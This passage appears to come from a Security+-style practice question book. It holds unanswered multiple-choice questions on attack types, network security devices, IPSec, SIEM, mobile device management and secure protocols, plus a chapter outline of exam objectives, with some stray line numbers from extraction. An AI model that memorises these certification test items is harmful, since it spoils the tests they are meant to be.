D. Phishing emails

110. Which of the following attacks can be caused by a user being unaware of their physical surroundings?
A. ARP poisoning
B. Phishing
C. Shoulder surfing
D. Smurf attack

111. Francine is a network administrator for Acme Corporation. She has noticed that one of the servers is now unreachable. After carefully reviewing various logs, she discovers that a large number of broadcast packets were sent to the network router, spoofing the server’s IP address. What type of attack is this?
A. SYN flood
B. ICMP flood
C. Buffer overflow
D. Smurf attack

112. An attacker enters code into a text box on a website. That text box is used for product reviews. The attacker wants his code to execute the next time a visitor visits that page. What is this attack called?
A. SQL injection
B. Logic bomb
C. Cross-site scripting
D. Session hijacking

113. A user is redirected to a different website when the user requests the DNS record www.xyz.com. Which of the following is this an example of?
A. DNS poisoning
B. DoS
C. DNS caching
D. Smurf attack

114. Tom is the network administrator for a small accounting firm. As soon as he comes in to work, users report to him that they cannot connect to the network. After investigating, Tom discovers that none of the workstations can connect to the network and all have an IP address in the form of 169.254.x.x. What has occurred?
A. Smurf attack
B. Man-in-the-middle attack
C. DDoS
D. DHCP starvation

115. Which of the following would most likely use a group of bots to stop a web server from accepting new requests?
A. DoS
B. DDoS
C. Buffer overflow
D. Trojan horse

116. Which of the following would a former employee most likely plant on a server before leaving to cause disruption to the network?
A. Worm
B. Logic bomb
C. Trojan
D. Virus

117. A SYN flood is a DoS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections. The signature of a SYN flood attack is:
A. The source and destination address having the same value
B. The source and destination port numbers having the same value
C. A large number of SYN packets appearing on a network without the corresponding ACK packets
D. A large number of SYN packets appearing on a network with the corresponding reply RST

118. What does white-box testing mean?
A. The tester has full knowledge of the environment.
B. The tester has no knowledge of the environment.
C. The tester has permission to access the system.
D. The tester has no permission to access the system.

119. Ahmed has been hired to perform a penetration test of Acme Corporation. He begins by looking at IP address ranges owned by the company and details of domain name registration. He also visits social media and newsgroups to see if they contain any sensitive information or have any technical details online. Within the context of penetration-examining methodology, what phase is Ahmed conducting?
A. Passive information gathering
B. Active information gathering
C. Initial exploitation
D. Vulnerability scanning

120. Mary works for a large insurance company, on their cybersecurity team. She is investigating a recent incident and discovers that a server was breached using an authorized user’s account. After investigating the incident further, Mary believes that the authorized user logged on, and then someone else took over their session. What best describes this attack?
A. Man-in-the-middle
B. Session hijacking
C. Backdoor
D. Smurf attack

121. Which of the following type of testing utilizes an automated process of proactively identifying vulnerabilities of the computing systems present on a network?
A. Security audit
B. Vulnerability scanning
C. White-box test
D. Black-box test

122. What type of attack is an NFC most susceptible to?
A. Eavesdropping
B. Man-in-the-middle
C. Buffer overflow
D. Smurf attack

123. John has been asked to do a penetration test of a company. He has been given general information but no details about the network. What kind of test is this?
A. Gray-box
B. White-box
C. Partial
D. Masked

124. Under which type of attack does an attacker’s system appear to be the server to the real client and appear to be the client to the real server?
A. Denial of service
B. Replay
C. Eavesdropping
D. Man-in-the-middle

125. You are a security administrator for Acme Corporation. You have discovered malware on some of your company’s machines. This malware seems to intercept calls from the web browser to libraries, and then manipulates the browser calls. What type of attack is this?
A. Man-in-the-browser
B. Man-in-the-middle
C. Buffer overflow
D. Session hijacking

126. Your company has hired a penetration testing firm to test the company network security. The penetration tester has just been able to achieve guest-level privileges on one low-security system. What best describes this phase of the test?
A. Vulnerability scanning
B. Initial exploit
C. Black-box testing
D. White-box testing

127. What is the primary risk from using outdated software?
A. It may not have all the features you need.
B. It may not have the most modern security features.
C. It may no longer be supported by the vendor.
D. It may be easier to break into than newer software.

128. You are responsible for software testing at Acme Corporation. You want to check all software for bugs that might be used by an attacker to gain entrance into the software or your network. You have discovered a web application that would allow a user to attempt to put a 64-bit value into a 4-byte integer variable. What is this type of flaw?
A. Memory overflow
B. Buffer overflow
C. Variable overflow
D. Integer overflow

129. Which type of virus is most difficult to analyze by reverse engineering?
A. Polymorphic
B. Macro
C. Armored
D. Boot sector

130. What type of attack attempts to deauthorize users from a resource, such as a wireless access point (WAP)?
A. Disassociation
B. Session hijacking
C. Man-in-the-middle
D. Smurf attack

131. John is a network administrator for a large retail chain. He has discovered that his DNS server is being attacked. The attack involves false DNS requests from spoofed IP addresses. The requests are far larger than normal. What type of attack is this?
A. Amplification
B. DNS poisoning
C. DNS spoofing
D. Smurf attack

132. Heidi is a security officer for an investment firm. Many of the employees in her firm travel frequently and access the company intranet from remote locations. Heidi is concerned about users logging in from public WiFi, as well as other people seeing information such as login credentials or customer data. Which of the following is Heidi’s most significant concern?
A. Social engineering
B. Shoulder surfing
C. Man-in-the-middle attack
D. CSRF

133. Cross-site scripting is an attack on the __________ that is based on the __________ trusting the __________.
A. user, user, website
B. user, website, user
C. website, website, user
D. user, website, website

134. You are a security officer for a large investment firm. Some of your stock traders handle very valuable accounts with large amounts of money. You are concerned about someone targeting these specific traders to get their login credentials and access account information. Which of the following best describes the attack you are concerned about?
A. Spear phishing
B. Man-in-the-middle
C. Target phishing
D. Vishing

135. You lead an incident response team for a large retail chain store. You have discovered what you believe is spyware on the point-of-sale systems. But the malware in question is encrypted, preventing you from analyzing it. What best describes this?
A. An armored virus
B. Ransomware
C. Polymorphic virus
D. Trojan horse

136. Jared has discovered malware on the workstations of several users. This particular malware provides administrative privileges for the workstation to an external hacker. What best describes this malware?
A. Trojan horse
B. Logic bomb
C. Multipartite virus
D. Rootkit

137. Users in your company report someone has been calling their extension and claiming to be doing a survey for a large vendor. Based on the questions asked in the survey, you suspect that this is a scam to elicit information from your company’s employees. What best describes this?
A. Spear phishing
B. Vishing
C. War dialing
D. Robocalling

138. Cross-site request forgery is an attack on the __________ that is based on the __________ trusting the __________.
A. website, website, user
B. user, user, website
C. website, user, website
D. user, website, user

139. What type of virus can infect both a file in the operating system and the boot sector?
A. Multipartite
B. Rootkit
C. Ransomware
D. Worm

140. John is analyzing a recent malware infection on his company network. He discovers malware that can spread rapidly and does not require any interaction from the user. What best describes this malware?
A. Worm
B. Virus
C. Logic bomb
D. Trojan horse

141. Your company has issued some new security directives. One of these new directives is that all documents must be shredded before being thrown out. What type of attack is this trying to prevent?
A. Phishing
B. Dumpster diving
C. Shoulder surfing
D. Man-in-the-middle

142. What type of attack embeds malicious code into a document or spreadsheet?
A. Logic bomb
B. Rootkit
C. Trojan horse
D. Macro virus

143. You are a network security analyst for an online retail website. Users report that they have visited your site and had their credit cards stolen. You cannot find any evidence of any breach of your website. You begin to suspect that these users were lured to a fake site. You have found a website that is spelled exactly like your company site, with one letter different. What is this attack called?
A. URL hijacking
B. DNS poisoning
C. Cross-site scripting
D. Man-in-the-middle

144. You have discovered that someone has been trying to log on to your web server. The person has tried a wide range of likely passwords. What type of attack is this?
A. Rainbow table
B. Birthday attack
C. Dictionary attack
D. Spoofing

145. You have just started a new job as a security administrator for Acme Corporation. You discover they have weak authentication protocols. You are concerned that an attacker might simply capture and re-send a user’s login credentials. What type of attack is this?
A. Replay attack
B. IP spoofing
C. Login spoofing
D. Session hijacking

146. What is the primary difference between active and passive reconnaissance?
A. Active will be done manually, passive with tools.
B. Active is done with black-box tests and passive with white-box tests.
C. Active is usually done by attackers and passive by testers.
D. Active will actually connect to the network and could be detected; passive won’t.

147. What is the primary difference between a vulnerability scan and a penetration test?
A. Vulnerability scans are done by employees and penetration tests by outside teams.
B. Vulnerability scans only use tools; penetration tests are manual.
C. Vulnerability scans just identify issues; penetration tests attempt to exploit them.
D. Vulnerability scans are usually white-box tests; penetration tests are black-box tests.

148. When an attacker breaches one system and uses that as a base to attack a related system, what is this called?
A. Man-in-the-middle
B. Pivot
C. Shimming
D. Vishing

149. Terrance is conducting a penetration test for a client. The client is a major e-commerce company and is primarily concerned about security for their web server. He has just finished running Nmap and OWASP Zap on the target web server. What is this activity called?
A. Passive scanning
B. Black-box testing
C. Active scanning
D. White-box testing

150. You have just taken over as the CISO for a large bank. You are concerned about making sure all systems are secure. One major concern you have is security misconfiguration. Which of the following is not a common security misconfiguration?
A. Unpatched operating system
B. Default accounts with passwords
C. Unneeded services running
D. No firewall running

Chapter 2

✓ ✓ 2.1 Install and configure network components, both hardware- and software-based, to support organizational security.
■ Firewall
  ■ ■ ACL
  ■ ■ Application-based vs. network-based
  ■ ■ Stateful vs. stateless
  ■ ■ Implicit deny
■ VPN concentrator
  ■ ■ Remote access vs. site-to-site
  ■ ■ IPSec
    ■ ■ Tunnel mode
    ■ ■ Transport mode
    ■ ■ AH
    ■ ■ ESP
  ■ ■ Split tunnel vs. full tunnel
  ■ ■ TLS
  ■ ■ Always-on VPN
■ NIPS/NIDS
  ■ ■ Signature-based
  ■ ■ Heuristic/behavioral
  ■ ■ Anomaly
  ■ ■ Inline vs. passive
  ■ ■ In-band vs. out-of-band
  ■ ■ Rule
  ■ ■ False positive
  ■ ■ False negative
■ Router
  ■ ■ ACLs
  ■ ■ Antispoofing
■ Switch
  ■ ■ Port security
  ■ ■ Layer 2 vs. Layer 3
  ■ ■ Loop prevention
  ■ ■ Flood guard
■ Proxy
  ■ ■ Forward and reverse proxy
  ■ ■ Transparent
  ■ ■ Application/multipurpose
■ Load balancer
  ■ ■ Analytics
  ■ ■ Scheduling
    ■ ■ Affinity
    ■ ■ Round-robin
  ■ ■ Active-passive
  ■ ■ Active-active
  ■ ■ Virtual IPs
■ Access point
  ■ ■ SSID
  ■ ■ MAC filtering
  ■ ■ Signal strength
  ■ ■ Band selection/width
  ■ ■ Antenna types and placement
  ■ ■ Fat vs. thin
  ■ ■ Controller-based vs. standalone
■ SIEM
  ■ ■ Aggregation
  ■ ■ Correlation
  ■ ■ Automated alerting and triggers
  ■ ■ Time synchronization
  ■ ■ Event deduplication
  ■ ■ Logs/WORM
■ DLP
  ■ ■ USB blocking
  ■ ■ Cloud-based
  ■ ■ Email
■ NAC
  ■ ■ Dissolvable vs. permanent
  ■ ■ Host health checks
  ■ ■ Agent vs. agentless
■ Mail gateway
  ■ ■ Spam filter
  ■ ■ DLP
  ■ ■ Encryption
■ Bridge
■ SSL/TLS accelerators
■ SSL decryptors
■ Media gateway
■ Hardware security module

✓ ✓ 2.2 Given a scenario, use appropriate software tools to assess the security posture of an organization.
■ Protocol analyzer
■ Network scanners
  ■ ■ Rogue system detection
  ■ ■ Network mapping
■ Wireless scanners/cracker
■ Password cracker
■ Vulnerability scanner
■ Configuration compliance scanner
■ Exploitation frameworks
■ Data sanitization tools
■ Steganography tools
■ Honeypot
■ Backup utilities
■ Banner grabbing
■ Passive vs. active
■ Command line tools
  ■ ■ ping
  ■ ■ netstat
  ■ ■ tracert
  ■ ■ nslookup/dig
  ■ ■ arp
  ■ ■ ipconfig/ip/ifconfig
  ■ ■ tcpdump
  ■ ■ nmap
  ■ ■ netcat

✓ ✓ 2.3 Given a scenario, troubleshoot common security issues.
■ Unencrypted credentials/clear text
■ Logs and events anomalies
■ Permission issues
■ Access violations
■ Certificate issues
■ Data exfiltration
■ Misconfigured devices
  ■ ■ Firewall
  ■ ■ Content filter
  ■ ■ Access points
■ Weak security configurations
■ Personnel issues
  ■ ■ Policy violation
  ■ ■ Insider threat
  ■ ■ Social engineering
  ■ ■ Social media
  ■ ■ Personal email
■ Unauthorized software
■ Baseline deviation
■ License compliance violation (availability/integrity)
■ Asset management
■ Authentication issues

✓ ✓ 2.4 Given a scenario, analyze and interpret output from security technologies.
■ HIDS/HIPS
■ Antivirus
■ File integrity check
■ Host-based firewall
■ Application whitelisting
■ Removable media control
■ Advanced malware tools
■ Patch management tools
■ UTM
■ DLP
■ Data execution prevention
■ Web application firewall

✓ ✓ 2.5 Given a scenario, deploy mobile devices securely.
■ Connection methods
  ■ ■ Cellular
  ■ ■ WiFi
  ■ ■ SATCOM
  ■ ■ Bluetooth
  ■ ■ NFC
  ■ ■ ANT
  ■ ■ Infrared
  ■ ■ USB
■ Mobile device management concepts
  ■ ■ Application management
  ■ ■ Content management
  ■ ■ Remote wipe
  ■ ■ Geofencing
  ■ ■ Geolocation
  ■ ■ Screen locks
  ■ ■ Push notification services
  ■ ■ Passwords and pins
  ■ ■ Biometrics
  ■ ■ Context-aware authentication
  ■ ■ Containerization
  ■ ■ Storage segmentation
  ■ ■ Full device encryption
■ Enforcement and monitoring for:
  ■ ■ Third-party app stores
  ■ ■ Rooting/jailbreaking
  ■ ■ Sideloading
  ■ ■ Custom firmware
  ■ ■ Carrier unlocking
  ■ ■ Firmware OTA updates
  ■ ■ Camera use
  ■ ■ SMS/MMS
  ■ ■ External media
  ■ ■ USB OTG
  ■ ■ Recording microphone
  ■ ■ GPS tagging
  ■ ■ WiFi direct/ad hoc
  ■ ■ Tethering
  ■ ■ Payment methods
■ Deployment models
  ■ ■ BYOD
  ■ ■ COPE
  ■ ■ CYOD
  ■ ■ Corporate-owned
  ■ ■ VDI

✓ ✓ 2.6 Given a scenario, implement secure protocols.
■ Protocols
  ■ ■ DNSSEC
  ■ ■ SSH
  ■ ■ S/MIME
  ■ ■ SRTP
  ■ ■ LDAPS
  ■ ■ FTPS
  ■ ■ SFTP
  ■ ■ SNMPv3
  ■ ■ SSL/TLS
  ■ ■ HTTPS
  ■ ■ Secure POP/IMAP
■ Use cases
  ■ ■ Voice and video
  ■ ■ Time synchronization
  ■ ■ Email and web
  ■ ■ File transfer
  ■ ■ Directory services
  ■ ■ Remote access
  ■ ■ Domain name resolution
  ■ ■ Routing and switching
  ■ ■ Network address allocation
  ■ ■ Subscription services

Technologies and Tools

1. John is looking for a new firewall for a small company. He is concerned about DoS attacks, particularly the SYN flood. Which type of firewall would give the best protection against the SYN flood?
A. Packet filter
B. Application gateway
C. Bastion
D. SPI

2. You are responsible for network security at an insurance company. A lot of employees bring their own devices. You have security concerns about this. You have decided to implement a process whereby when users connect to your network, their devices are scanned. If a device does not meet your minimum security requirements, it is not allowed to connect. What best describes this?
A. NAC
B. SPI
C. IDS
D. BYOD

3. Ahmed is responsible for VPN connections at his company. His company uses IPSec exclusively. He has decided to implement IPSec in a mode that encrypts the data of only the packet, not the headers. What is this called?
A. Tunneling
B. IKE
C. ESP
D. Transport

4. Maria is responsible for monitoring IDS activity on her company’s network. Twice in the past month there has been activity reported on the IDS that investigation has shown was legitimate traffic. What best describes this?
A. False negative
B. Passive
C. Active
D. False positive

5. Juanita is a network administrator for a large university. The university has numerous systems, each with logs she must monitor and analyze. What would be the best approach for her to view and analyze logs from a central server?
A. NAC
B. Port forwarding
C. IDS
D. SIEM

6. Enrique is responsible for web application security at his company. He is concerned about attacks such as SQL injection. Which of the following devices would provide the best protection for web attacks on his web application server?
A. ACL
B. SPI
C. WAF
D. IDS

7. ACME Company has several remote offices. The CIO wants to set up permanent secure connections between the remote offices and the central office. What would be the best solution for this?
A. L2TP VPN
B. IPSEC VPN
C. Site-to-site VPN
D. Remote-access VPN

8. Mary is responsible for network security at a medium-sized insurance company. She is concerned that the offices are too open to public traffic and someone could simply connect a laptop to an open RJ45 jack and access the network. Which of the following would best address this concern?
A. ACL
B. IDS
C. VLAN
D. Port security

9. You are the network administrator for an e-commerce company. You are responsible for the web server cluster. You are concerned about not only failover, but also load-balancing and using all the servers in your cluster to accomplish load-balancing. What should you implement?
A. Active-active
B. Active-passive
C. Affinity
D. Round-robin

10. Donald is working as a network administrator. He is responsible for the database cluster. Connections are load-balanced in the cluster by each new connection being simply sent to the next server in the cluster. What type of load-balancing is this?
A. Round-robin
B. Affinity
C. Weighted
D. Rotating

11. Gerald is setting up new wireless access points throughout his company’s building. The wireless access points have just the radio transceiver, with no additional functionality. What best describes these wireless access points?
A. Fat
B. Repeater
C. Thick
D. Thin

12. Mohaned is an IT manager for a hotel. His hotel wants to put wireless access points on each floor. The specifications state that the wireless access points should have minimal functionality, with all the configuration, authentication, and other functionality centrally controlled. What type of wireless access points should Mohaned consider purchasing?
A. Fat
B. Controller-based
C. Stand-alone
D. 801.11i
141213. What IPSec protocol provides authentication and encryption?
1413A. AH
1414B. ESP
1415C. IKE
1416D. ISAKMP
141714. Terrance is implementing IPSec. He wants to ensure that the packets are encrypted, and
1418that the packet and all headers are authenticated. What should he implement?
1419A. AH
1420B. ESP
1421C. AH and ESP
1422D. IKE
142315. You are responsible for security at your company. One of management’s biggest concerns
1424is that employees might exfiltrate sensitive data. Which of the following would you
1425implement first?
1426A. IPS
1427B. Routine audits of user machines
1428C. VLAN
1429D. USB blocking
143016. You are responsible for email server security in your company. You want to implement
1431encryption of all emails, using third-party authenticated certificates. What protocol
1432should you implement?
1433A. IMAP
1434B. S/MIMEChapter 2
1435C. PGP
1436D. SMTP-S
17. Joanne is responsible for all remote connectivity to her company’s network. She knows
that administrators frequently log in to servers remotely to execute command-line commands
and Linux shell commands. She wants to make sure this can only be done if the
transmission is encrypted. What protocol should she use?
A. HTTPS
B. RDP
C. Telnet
D. SSH
18. You are responsible for network management at your company. You have been using
SNMP for many years. You are currently using SNMP v2. A colleague has recently
suggested you upgrade to SNMP v3. What is the primary benefit of SNMP v3?
A. It is much faster.
B. It integrates with SIEM.
C. It uses CHAP authentication.
D. It is encrypted.
19. Employees in your company are allowed to use tablets. They can select a tablet from four
different models approved by the company but purchased by the employee. What best
describes this?
A. BYOD
B. CYOD
C. COPE
D. BYOE
20. Mahmoud is considering moving all company desktops to a VDI deployment. Which of
the following would be a security advantage of VDI?
A. Employees can work from any computer in the company.
B. VDI is more resistant to malware.
C. Patch management is centrally controlled.
D. It eliminates man-in-the-middle attacks.
21. You have been assigned to select a backup communication method for your company to
use in case of significant disasters that disrupt normal communication. Which option
would provide the most reliability?
A. Cellular
B. WiFi
C. SATCOM
D. VoIP
22. John is concerned about the security of data on smartphones and tablets that his company
issues to employees. Which of the following would be most effective in preventing data
loss, should a device be stolen?
A. Remote wipe
B. Geolocation
C. Strong PIN
D. Limited data storage
23. What does geofencing accomplish?
A. Provides the location for a mobile device.
B. Limits the range a mobile device can be used in.
C. Determines WiFi coverage areas.
D. Segments the WiFi.
24. What best describes mobile device content management?
A. Limiting how much content can be stored.
B. Limiting the type of content that can be stored.
C. Blocking certain websites.
D. Digitally signing authorized content.
25. Frank believes there could be a problem accessing the DHCP server from a specific client.
He wants to check by getting a new dynamic IP. What command will do this?
A. ipconfig /request
B. NETSTAT -renew
C. ipconfig /renew
D. NETSTAT /request
26. Teresa is responsible for network administration at a health club chain. She is trying to
find a communication technology that uses low power and can spend long periods in
low-power sleep modes. Which of the following technologies would be the best fit?
A. WiFi
B. Cellular
C. Bluetooth
D. ANT
27. What technology was first introduced in Windows Vista and still exists in Windows that
helps prevent malware by requiring user authorization to run executables?
A. DEP
B. DLP
C. UTM
D. ANT
28. John is responsible for security of his company’s new e-commerce server. He wants to
ensure that online transactions are secure. What technology should he use?
A. L2TP
B. IPSec
C. SSL
D. TLS
29. Frank is a network administrator for a small college. The college has implemented a
simple NIDS. However, the NIDS seems to only catch well-known attacks. What
technology is this NIDS likely missing?
A. Heuristic scanning
B. Signature scanning
C. Passive scanning
D. Active scanning
30. You are concerned about an attacker enumerating all of your network. What protocol
might help at least mitigate this issue?
A. HTTPS
B. TLS
C. IPSec
D. LDAPS
31. You have been asked to implement a secure protocol for transferring files that uses digital
certificates. Which protocol would be the best choice?
A. FTP
B. SFTP
C. FTPS
D. SCP
32. Ahmed is responsible for VoIP at his company. He has been directed to ensure that all
VoIP calls have the option to be encrypted. What protocol is best suited for securing
VoIP calls?
A. SIP
B. TLS
C. SRTP
D. SSH
33. What is the purpose of screen locks on mobile devices?
A. To encrypt the device
B. To limit access to the device
C. To load a specific user’s apps
D. To connect to WiFi
34. Maria is a security engineer with a large bank. Her CIO has asked her to investigate
the use of context-aware authentication for online banking. Which of the following best
describes context-aware authentication?
A. In addition to username and password, authentication is based on the entire context
(location, time of day, action being attempted, etc.).
B. Without a username or password, authentication is based on the entire context
(location, time of day, action being attempted, etc.).
C. Authentication that requires a username and password, but in the context of a token
or digital certificate
D. Authentication that requires a username and password, but not in the context of a
token or digital certificate
35. What does application management accomplish for mobile devices?
A. Only allows applications from the iTunes store to be installed
B. Ensures the company has a list of all applications on the devices
C. Ensures only approved applications are installed on the devices
D. Updates patches on all applications on mobile devices
36. Dominick is responsible for security at a medium-sized insurance company. He is very
concerned about detecting intrusions. The IDS he has purchased states that he must have
an IDS on each network segment. What type of IDS is this?
A. Active
B. IPS
C. Passive
D. Inline
37. Remote employees at your company frequently need to connect to both the secure
company network via VPN and open public websites, simultaneously. What technology
would best support this?
A. Split tunnel
B. IPSec
C. Full tunnel
D. TLS
38. Denish is looking for a solution that will allow his network to retrieve information from a
wide range of web resources, while all traffic passes through a proxy. What would be the
best solution?
A. Forward proxy
B. Reverse proxy
C. SPI
D. Open proxy
39. Someone has been rummaging through your company’s trash bins seeking to find
documents, diagrams, or other sensitive information that has been thrown out. What
is this called?
A. Dumpster diving
B. Trash diving
C. Social engineering
D. Trash engineering
40. Derrick is responsible for a web server cluster at his company. The cluster uses various
load-balancing protocols. Derrick wants to ensure that clients connecting from Europe are
directed to a specific server in the cluster. What would be the best solution to his problem?
A. Affinity
B. Binding
C. Load balancing
D. Round-robin
41. Teresa is responsible for WiFi security in her company. Her main concern is that there are
many other offices in the building her company occupies and that someone could easily
attempt to breach their WiFi from one of these locations. What technique would be best
in alleviating her concern?
A. Using thin WAPs
B. Geofencing
C. Securing the Admin screen
D. WAP placement
42. Juan is responsible for the SIEM in his company. The SIEM aggregates logs from 12 servers.
In the event that a breach is discovered, which of the following would be Juan’s most important
concern?
A. Event duplication
B. Time synchronization
C. Impact assessment
D. Correlation
43. When you are considering an NIDS or NIPS, what are your two most important
concerns?
A. Cost and false positives
B. False positives and false negatives
C. Power consumption and cost
D. Management interface and cost
44. Shelly is very concerned about unauthorized users connecting to the company routers.
She would like to prevent spoofing. What is the most essential antispoofing technique for
routers?
A. ACL
B. Logon
C. NIPS
D. NIDS
45. Farès has implemented a flood guard. What type of attack is this most likely to defend
against?
A. SYN attack
B. DNS poisoning
C. MAC spoofing
D. ARP spoofing
46. Terrance is trying to get all of his users to connect to a certificate server on his network.
However, some of the users are using machines that are incompatible with the certificate
server, and changing those machines is not an option. Which of the following would be
the best solution for Terrance?
A. Use an application proxy for the certificate server.
B. Use NAT with the certificate server.
C. Change the server.
D. Implement a protocol analyzer.
47. John is implementing virtual IP load-balancing. He thinks this might alleviate network
slowdowns, and perhaps even mitigate some of the impact of a denial-of-service attack.
What is the drawback of virtual IP load-balancing?
A. It is resource-intensive.
B. Most servers don’t support it.
C. It is connection-based, not load-based.
D. It works only on Unix/Linux servers.
48. There has been a breach of the ACME network. John manages the SIEM at ACME. Part
of the attack disrupted NTP; what SIEM issue would this most likely impact?
A. Time synchronization
B. Correlation
C. Event duplication
D. Events not being logged
49. What command would produce the image shown here?
A. ping -n 6 -l 100 192.168.1.1
B. ping 192.168.1.1 -n 6 -s 100
C. ping #6 s 100 192.168.1.1
D. ping -s 6 -w 100 192.168.1.1
50. You are a security officer for a large law firm. You are concerned about data loss prevention.
You have limited the use of USBs and other portable media, you use an IDS to look
for large volumes of outbound data, and a guard searches all personnel and bags before
they leave the building. What is a key step in DLP that you have missed?
A. Portable drives
B. Email
C. Bluetooth
D. Optical media
51. Which of the following email security measures would have the most impact on
phishing emails?
A. Email encryption
B. Hardening the email server
C. Digitally signing email
D. Spam filter
52. Joanne has implemented TLS for communication with many of her network servers. She
wants to ensure that the traffic cannot be sniffed. However, users now complain that this
is slowing down connectivity. Which of the following is the best solution?
A. Increase RAM on servers.
B. Change routers to give more bandwidth to traffic to these servers.
C. Implement TLS accelerators.
D. Place all servers in clusters with extensive load-balancing.
53. Olivia has discovered steganography tools on an employee’s computer. What is the
greatest concern regarding employees having steganography tools?
A. Password cracking
B. Data exfiltration
C. Hiding network traffic
D. Malware
54. What command would generate the output shown here?
A. netstat -a
B. netstat -o
C. arp -a
D. arp -g
55. John has discovered that an attacker is trying to get network passwords by using software
that attempts a number of passwords from a list of common passwords. What type of
attack is this?
A. Dictionary
B. Rainbow table
C. Brute force
D. Session hijacking
56. Isabella has found netcat installed on an employee’s computer. That employee is not
authorized to have netcat. What security concern might this utility present?
A. It is a password cracker.
B. It is a packet sniffer.
C. It is a network communication utility.
D. It is a DoS tool.
57. Omar is a network administrator for ACME Company. He is responsible for the certificate
authorities within the corporate network. The CAs publish their CRLs once per
week. What, if any, security issue might this present?
A. Revoked certificates still being used
B. Invalid certificates being issued
C. No security issue
D. Certificates with weak keys
58. Hans is a network administrator for a large bank. He is concerned about employees violating
software licenses. What would be the first step in addressing this issue?
A. Performing software audits
B. Scanning the network for installed applications
C. Establishing clear policies
D. Blocking the ability of users to install software
59. You are responsible for authentication methods at your company. You have implemented
fingerprint scanners to enter server rooms. Frequently people are being denied access to
the server room, even though they are authorized. What problem is this?
A. FAR
B. FRR
C. CER
D. EER
60. John is responsible for network security at a very small company. Due to both budget
constraints and space constraints, John can select only one security device. What should
he select?
A. Firewall
B. Antivirus
C. IDS
D. UTM
61. You are responsible for security at Acme Company. Recently, 20 new employee network
accounts were created, with the default privileges for the network. You have discovered
that eight of these have privileges that are not needed for their job tasks. Which security
principle best describes how to avoid this problem in the future?
A. Least privileges
B. Separation of duties
C. Implicit deny
D. Weakest link
62. Mary is concerned that SIEM logs at her company are not being stored long enough, or
securely enough. She is aware that it is possible a breach might not be discovered until
long after it occurs. This would require the company to analyze older logs. It is important
that Mary find an SIEM log backup solution that can a) handle all the aggregate logs of
the SIEM, b) be maintained for a long period of time, and c) be secure. What solution
would be best for her?
A. Back up to large-capacity external drives.
B. Back up to large-capacity backup tapes.
C. Back up to WORM storage.
D. Back up to tapes that will be stored off-site.
63. Elizabeth is responsible for SIEM systems in her company. She monitors the company’s
SIEM screens every day, checking every hour. What, if any, would be a better approach
for her to keep up with issues that appear in the logs?
A. Automatic alerts
B. Having logs forwarded to her email
C. Nothing, this is fine.
64. You are responsible for network security at a university. Faculty members are issued
laptops. However, many of the faculty members leave the laptops in their offices most of
the time (sometimes even for weeks). You are concerned about theft of laptops. In this
scenario, what would be the most cost-effective method of securing the laptops?
A. FDE
B. GPS tagging
C. Geofencing
D. Tethering
65. You work at a defense contracting company. You are responsible for mobile device
security. Some researchers in your company use company-issued tablets for work. These
tablets may contain sensitive, even classified data. What is the most important security
measure for you to implement?
A. FDE
B. GPS tagging
C. Geofencing
D. Content management
66. When using any HIDS/HIPS or NIDS/NIPS, the output is specific to the vendor. However,
what is the basic set of information that virtually all HIDSs/HIPSs or
NIDSs/NIPSs provide?
A. IP addresses (sender and receiver), ports (sender and receiver), and protocol
B. IP addresses (sender and receiver), ports (sender and receiver), and attack type
C. IP addresses (sender and receiver), ports (sender and receiver), usernames, and
machine names
D. Usernames, machine names, and attack type
67. You are responsible for firewalls in your company. You are reviewing the output of the
gateway firewall. What basic information would any firewall have in its logs?
A. For all traffic: the source and destination IP and port, protocol, and whether it was
allowed or denied
B. For only blocked traffic: the source and destination IP and port as well as the reason
for the traffic being denied/blocked
C. For all traffic: the source and destination IP and port, whether it was allowed or
denied, and the reason it was denied/blocked
D. For only blocked traffic: the source and destination IP, protocol, and the reason it
was denied/blocked
68. Teresa is responsible for incident response at ACME Company. There was a recent breach
of the network. The breach was widespread and affected many computers. As part of the
incident response process, Teresa will collect the logs from the SIEM, which aggregates
logs from 20 servers. Which of the following should she do first?
A. Event de-duplication
B. Log forwarding
C. Identify the nature of the attack
D. Identify the source IP of the attack
69. Hector is responsible for NIDS/NIPS in his company. He is configuring a new NIPS
solution. What part of the NIPS collects data?
A. Sensor
B. Data source
C. Manager
D. Analyzer
70. Gerald is a network administrator for a small financial services company. He is responsible
for controlling access to resources on his network. What mechanism is responsible
for blocking access to a resource based on the requesting IP address?
A. ACL
B. NIPS
C. HIPS
D. Port blocking
71. Elizabeth is responsible for secure communications at her company. She wants to give
administrators the option to log in remotely and to execute command-line functions, but
she wants this to only be possible via a secure, encrypted connection. What action should
she take on the firewall?
A. Block port 23 and allow ports 20 and 21.
B. Block port 22 and allow ports 20 and 21.
C. Block port 22 and allow port 23.
D. Block port 23 and allow port 22.
72. Mark is looking for a proxy server for his network. The purpose of the proxy server is
to ensure that the web servers are hidden from outside clients. All of the different web
servers should appear to the outside world as if they were the proxy server. What type of
proxy server would be best for Mark to consider?
A. Forward
B. Reverse
C. Transparent
D. Firewall
73. Your company has hired an outside security firm to perform various tests of your
network. During the vulnerability scan you will provide that company with logins for
various systems (i.e., database server, application server, web server, etc.) to aid in their
scan. What best describes this?
A. A white-box test
B. A gray-box test
C. A credentialed scan
D. A logged-in scan
74. Lars is responsible for incident response at ACME Company. He is particularly concerned
about the network segment that hosts the corporate web servers. He wants a solution that
will detect potential attacks and notify the administrator so the administrator can take
whatever action he or she deems appropriate. Which of the following would be the best
solution for Lars?
A. HIDS
B. HIPS
C. NIDS
D. NIPS
75. Mia is responsible for security devices at her company. She is concerned about detecting
intrusions. She wants a solution that would work across entire network segments. However,
she wants to ensure that false positives do not interrupt work flow. What would be
the best solution for Mia to consider?
A. HIDS
B. HIPS
C. NIDS
D. NIPS
76. Abigail is a security manager for a small company. Many employees want to use handheld
devices, such as smartphones and tablets. The employees want to use these devices both
for work and outside of work. Abigail is concerned about security issues. Which of the
following would be the most secure solution?
A. COPE
B. CYOD
C. Geotagging
D. BYOD
77. You are responsible for always-on VPN connectivity for your company. You have been
told that you must use the most secure mode for IPSec that you can. Which of the following
would be the best for you to select?
A. Tunneling
B. AH
C. IKE
D. Transport
78. Debra is the network administrator for her company. Her company’s web servers are all in
a cluster. Her concern is this: if one of the servers in the cluster fails, will the backup server
be capable of running for a significant amount of time? She wants to make sure that the
backup won’t soon fail. What would be her best choice in clustering?
A. Active-active
B. Round-robin
C. Affinity
D. Active-passive
79. Omar is responsible for wireless security in his company. He wants completely different
WiFi access (i.e., a different SSID, different security levels, and different authentication
methods) in different parts of the company. What would be the best choice for Omar to
select in WAPs?
A. Fat
B. Thin
